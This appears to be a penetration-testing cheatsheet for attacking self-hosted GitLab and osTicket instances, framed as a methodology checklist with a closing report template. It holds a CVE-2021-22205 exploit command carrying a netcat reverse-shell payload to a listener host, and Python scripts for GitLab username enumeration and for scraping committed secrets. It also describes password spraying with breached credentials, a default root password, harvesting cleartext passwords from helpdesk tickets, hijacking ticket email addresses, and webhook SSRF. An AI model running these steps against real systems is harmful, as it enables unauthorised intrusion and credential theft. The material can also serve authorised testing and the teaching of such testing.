Methodology Checklist
- GitLab: check version at /help or in HTTP response headers
- CVE-2021-22205: unauthenticated RCE via image upload (affects 11.9 through 13.10.2; fixed in 13.10.3, 13.9.6, 13.8.8)
- GitLab registration: self-register if open, explore internal repos
- Search repos for secrets: API keys, credentials, internal URLs
- osTicket: staff control panel (agents and admins) at /scp/
- osTicket CVEs for version-specific RCE
- Test file attachment upload for webshell
Operational Context
Use when: GitLab or osTicket identified → enumerate repositories for secrets, exploit authentication bypasses, or leverage known CVEs.
Think Dumber First: GitLab self-hosted: check /explore for public repos without authentication. Search repo contents for API keys, .env files, hardcoded passwords. osTicket: check for CVE-2020-24881 or default admin creds.
Skip when: GitLab is cloud-hosted (gitlab.com) → attack surface limited to what the scope permits; focus on leaked credentials and credential stuffing instead.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `curl -i http://[TARGET_IP]:[PORT]/explore` | GitLab: unauthenticated public project recon |
| `curl -i http://[TARGET_IP]:[PORT]/users/sign_up` | GitLab: sign-up form; submitting a taken name returns the "Username is already taken" error (username enumeration) |
| `./gitlab_userenum.sh --url http://[TARGET_IP]:[PORT]/ --userlist [WORDLIST]` | GitLab automated user enumeration |
| `python3 gitlab_13_10_2_rce.py -t http://[TARGET_IP]:[PORT] -u [USER] -p [PASS] -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/bash -i 2>&1\|nc [LHOST] [LPORT] >/tmp/f'` | GitLab CE ≤ 13.10.2 ExifTool RCE (CVE-2021-22205) |
| `python3 dehashed.py -q [TARGET_DOMAIN] -p` | Search breach databases for leaked credentials |
| `cat subdomains.txt \| httpx -sc -title -o alive_hosts.txt` | Fast probe subdomains for live web apps (osTicket discovery) |
| `eyewitness -f alive_hosts.txt --web` | Screenshot alive hosts for visual inspection |
Deep Dive & Workflow
GitLab Attack Flow
1. Check /explore (unauthenticated) → public projects + snippets
- /explore/snippets → often missed, frequently holds hardcoded secrets
2. Check /users/sign_up β username enumeration
"Username is already taken" = valid user
Common targets: root, admin, developer, [employee names]
3. If self-registration enabled β register account β access Internal projects
4. Enumerate all repos:
- Check commit history (Initial Commit = 90% of secrets)
- Check dev/staging/test branches
- Hunt: .env, config.php, id_rsa, .gitlab-ci.yml, setup.sh
5. CVE-2021-22205 (GitLab CE/EE 11.9 through 13.10.2):
- ExifTool (CVE-2021-22204) executes code embedded in the metadata of an uploaded image
- Originally disclosed as authenticated, later confirmed exploitable without credentials because the upload endpoint was reachable before login. The script below still takes -u/-p, so use a self-registered account where self-registration is enabled
- python3 gitlab_13_10_2_rce.py -t http://[TARGET] -u [USER] -p [PASS] -c '[SHELL]'
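For step 4 (hunting secrets across every branch and the commit history), the following is an added example rather than code from the original page: it reads a `git log -p --all` stream, tracks which commit and file each added line belongs to, and flags credential-shaped values and files worth opening by hand. The pattern list, the placeholder filter and the sample log are illustrative and constructed here, not taken from any real repository.

```python
#!/usr/bin/env python3
"""Scan `git log -p --all` output for committed secrets.

Added example, not code from the original page. Assumes the input is produced by
`git log -p --all` (deleted files appear as "+++ /dev/null"); the file names and
value patterns below are illustrative, not exhaustive.
"""
import re
import sys
from dataclasses import dataclass
from typing import List, Optional

# Credential-shaped values; the first matching kind wins for a given line.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "gitlab_pat": re.compile(r"glpat-[0-9A-Za-z_-]{20,}"),
    "generic_password": re.compile(
        r"(?i)(?:password|passwd|pwd|secret(?:_key)?|api[_-]?key|token)\s*[=:]\s*['\"]?([^\s'\"]{6,})"
    ),
    "url_with_creds": re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s:@]+@"),
}

# File names that deserve a manual look even when no value pattern fires.
INTERESTING_FILES = re.compile(
    r"(?:^|/)(?:\.env[^/]*|config\.php|id_rsa|id_ed25519|\.gitlab-ci\.yml|setup\.sh|[^/]+\.pem)$"
)

# Values that reference a secret rather than contain one: env lookups, templates, placeholders.
PLACEHOLDER_HINTS = ("environ", "getenv", "changeme", "example", "xxxx")


@dataclass
class Finding:
    commit: Optional[str]
    path: Optional[str]
    kind: str
    line: str


def looks_like_placeholder(value: str) -> bool:
    v = value.lower()
    return v.startswith(("$", "{", "<", "%")) or any(h in v for h in PLACEHOLDER_HINTS)


def scan_git_log(text: str) -> List[Finding]:
    """Walk the patch stream, tracking the current commit and file, and flag added lines."""
    findings: List[Finding] = []
    commit: Optional[str] = None
    path: Optional[str] = None
    for raw in text.splitlines():
        if raw.startswith("commit "):
            commit = raw.split()[1][:12]
        elif raw.startswith("+++ "):
            path = raw[4:]
            path = path[2:] if path.startswith("b/") else path
            if INTERESTING_FILES.search(path):
                findings.append(Finding(commit, path, "interesting_file", raw))
        elif raw.startswith("+"):
            added = raw[1:]
            for kind, pattern in SECRET_PATTERNS.items():
                match = pattern.search(added)
                if not match:
                    continue
                if kind == "generic_password" and looks_like_placeholder(match.group(1)):
                    continue
                findings.append(Finding(commit, path, kind, added.strip()))
                break
    return findings


# Constructed sample of `git log -p --all` output (not real data, not a real key).
SAMPLE_LOG = """\
commit 3f2a1c9b7d4e6f0a1b2c3d4e5f60718293a4b5c6
Author: dev <dev@example.test>
Date:   Mon Jan 1 00:00:00 2024 +0000

    Initial commit

diff --git a/.env b/.env
new file mode 100644
--- /dev/null
+++ b/.env
@@ -0,0 +1,3 @@
+DB_HOST=db.internal
+DB_PASSWORD=Sup3rS3cret!
+AWS_ACCESS_KEY_ID=AKIAZZ3QX7TESTKEY001
diff --git a/app/config.py b/app/config.py
--- a/app/config.py
+++ b/app/config.py
@@ -1,2 +1,2 @@
-DATABASE_URL = "postgres://app:oldpass@db.internal/app"
+DATABASE_URL = "postgres://app:n3wpass@db.internal/app"
+SECRET_KEY = os.environ["SECRET_KEY"]
"""


if __name__ == "__main__":
    source = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else sys.stdin
    for f in scan_git_log(source.read()):
        print(f"{f.commit} {f.path} [{f.kind}] {f.line}")
```

Run it as `git log -p --all | python3 git_secret_scan.py` inside each cloned repo; `--all` covers the dev/staging/test branches from step 4, and the commit hash in each finding points you at the "Initial commit" most leaks live in. Removed lines (`-`) are skipped deliberately because a credential that was rotated out still shows up in the commit where it was added.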
Default creds: root:5iveL!fe (older installs). Version at /help (authenticated only).
Brute-force lockout: 10 failed attempts → 10-minute lockout. Spray slowly.
Stabilize shell after RCE:
python3 -c 'import pty; pty.spawn("/bin/bash")'
osTicket Attack Flow
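The username enumeration from step 2, written out as an added example (not code from the original page or from the gitlab_userenum.sh script it mentions). It assumes the target serves GET /users/<name>/exists, the JSON availability check behind the sign-up form, which answers `{"exists":true}` for a taken name; the fetcher is injectable so the logic can be exercised offline, and an unavailable endpoint is reported as unknown rather than as "name free".

```python
#!/usr/bin/env python3
"""GitLab username enumeration.

Added example, not code from the original page. Assumption: the target serves
GET /users/<name>/exists, the JSON availability check the sign-up form uses,
answering {"exists":true} for a taken username.
"""
import json
import sys
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# A fetcher returns (status_code, body). It is a parameter so the classification
# logic can be tested offline with a fake instead of a live GitLab.
Fetcher = Callable[[str], Tuple[int, str]]


def http_get(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """GET with a browser-like UA; HTTP error responses are returned, not raised."""
    req = urllib.request.Request(
        url, headers={"User-Agent": "Mozilla/5.0", "Accept": "application/json"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def username_exists(base_url: str, username: str, fetch: Fetcher = http_get) -> Optional[bool]:
    """True/False from the JSON answer; None when the endpoint is absent or unparseable,
    so a disabled endpoint is never mistaken for "username is free"."""
    status, body = fetch(f"{base_url.rstrip('/')}/users/{username}/exists")
    if status != 200:
        return None
    try:
        return bool(json.loads(body).get("exists"))
    except (ValueError, AttributeError):
        return None


def enumerate_users(base_url: str, candidates: Iterable[str], fetch: Fetcher = http_get,
                    delay: float = 0.5) -> Dict[str, List[str]]:
    """Classify candidates as valid / invalid / unknown, pausing between requests
    to keep the rate modest in case unauthenticated rate limiting is enabled."""
    result: Dict[str, List[str]] = {"valid": [], "invalid": [], "unknown": []}
    for name in candidates:
        name = name.strip()
        if not name:
            continue
        verdict = username_exists(base_url, name, fetch)
        bucket = "unknown" if verdict is None else ("valid" if verdict else "invalid")
        result[bucket].append(name)
        if delay:
            time.sleep(delay)
    return result


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://[TARGET_IP]:[PORT] [WORDLIST]")
    with open(sys.argv[2], encoding="utf-8", errors="replace") as fh:
        found = enumerate_users(sys.argv[1], fh)
    for user in found["valid"]:
        print(user)
    if found["unknown"]:
        print(f"# {len(found['unknown'])} unknown (endpoint unavailable?)", file=sys.stderr)
```

Feed the printed valid names into the password spray; the enumeration itself does not count against the login lockout above, but the spray does, so keep it under the 10-attempt threshold per account.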
Discovery:
- OSTSESSID cookie or "Powered by osTicket" in footer
- httpx probe → eyewitness screenshot → identify portal
Agent panel: /scp/login.php
Open ticket: http://[TARGET]/open.php
Attack vectors:
1. OSINT/breach creds → dehashed.py → spray against /scp/login.php
2. Closed tickets → search for "password", "VPN", "reset", "standard"
→ IT often sends cleartext passwords in ticket replies
3. Email hijacking:
- Open new ticket → observe assigned ticket email (e.g., 940288@company.local)
- Use this email to register on internal services (GitLab, Mattermost, etc.)
- Receive confirmation email in osTicket dashboard
4. Export address book β valid usernames for password spraying
CVE-2020-24881: osTicket 1.14.1 SSRF → pivot into internal network.
Key insight: osTicket is primarily a pivot tool, not a direct RCE target. Use it to:
- Harvest cleartext passwords from tickets
- Generate internal email addresses
- Build valid username lists
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| GitLab explore page blocked | Signup/explore restricted | Try direct project URL: http://[TARGET]/[GROUP]/[REPO]; some repos public even if explore blocked |
| GitLab API requires auth | No guest access | Try: GET /api/v4/projects → public projects are listed without a token unless public visibility has been restricted in admin settings |
| Git clone fails with auth | Repo private | Check for .git in web dir: http://[TARGET]/.git/config β some deployments expose .git folder |
| osTicket staff login location | Non-default URL | Try: /scp/login.php, /support/scp/login.php, /helpdesk/scp/ |
| GitLab SSRF via Webhooks | Need project creation rights; since GitLab 10.6 webhook requests to the local network are blocked by default unless an admin has allowed them | Create project → Settings → Integrations/Webhooks → Webhook URL = internal address → trigger via push or the hook's Test button |
Reporting Trigger
Finding Title: GitLab Instance Exposes Sensitive Repositories or Credentials
Impact: Publicly accessible GitLab repositories containing API keys, database credentials, private keys, or internal architecture documentation provide attackers with direct credential access and infrastructure knowledge without any exploitation.
Root Cause: Repositories configured as public without content review. No secrets scanning in the CI/CD pipeline to prevent credential commits.
Recommendation: Audit all GitLab repositories for sensitive content. Implement pre-commit hooks to block credential commits. Enable GitLab Secret Detection. Enforce private-by-default for all repositories. Rotate any exposed credentials immediately.